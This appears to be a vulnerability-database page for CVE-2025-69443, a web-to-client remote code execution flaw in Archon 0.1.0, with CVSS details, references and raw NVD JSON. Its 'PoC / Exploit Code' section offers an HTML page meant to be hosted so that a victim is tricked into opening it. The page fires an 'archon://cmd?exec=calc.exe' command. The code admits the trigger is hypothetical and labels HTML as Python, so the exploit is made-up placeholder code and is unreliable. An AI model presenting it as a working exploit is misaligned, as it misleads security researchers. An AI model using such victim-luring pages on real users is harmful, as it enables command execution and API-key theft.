CVE-2025-69443

Description

Remote Code Execution in coleam00 Archon 0.1.0. A crafted HTML page, when accessed by a victim, can execute commands, run prompts on behalf of the user, control the Archon UI features, and steal all Archon information available on the UI including API keys.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

coleam00 Archon 0.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- 
PoC for CVE-2025-69443 
Description: A crafted HTML page that triggers command execution in Archon.
Usage: Host this file and trick the victim into opening it in a vulnerable environment.
-->
<!DOCTYPE html>
<html>
<head>
    <title>Archon Exploit</title>
</head>
<body>
    <h1>CVE-2025-69443 PoC</h1>
    <script>
        // Attempt to trigger the RCE vulnerability
        // This simulates the malicious payload found in crafted HTML pages
        // The actual payload mechanism depends on Archon's internal implementation
        try {
            // Example trigger (hypothetical)
            window.location.href = "archon://cmd?exec=calc.exe";
            
            // Alternatively, if there is an exposed API object:
            // if (window.archon) {
            //     window.archon.execute('whoami');
            // }
        } catch (e) {
            console.log("Exploit failed: " + e);
        }
    </script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69443
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69443
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69443/
[4] VulDB https://vuldb.com/cve/CVE-2025-69443
[5] https://github.com/coleam00/Archon
[6] https://www.ox.security/blog/archon-remote-code-execution
[7] https://www.ox.security/blog/cve-2025-69443-archon-os-vulnerable-to-unauthenticated-web-to-client-attack/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69443", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:44.430", "lastModified": "2026-05-15T15:16:50.013", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Remote Code Execution in coleam00 Archon 0.1.0. A crafted HTML page, when accessed by a victim, can execute commands, run prompts on behalf of the user, control the Archon UI features, and steal all Archon information available on the UI including API keys."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/coleam00/Archon", "source": "[email protected]"}, {"url": "https://www.ox.security/blog/archon-remote-code-execution", "source": "[email protected]"}, {"url": "https://www.ox.security/blog/cve-2025-69443-archon-os-vulnerable-to-unauthenticated-web-to-client-attack/", "source": "[email protected]"}]}}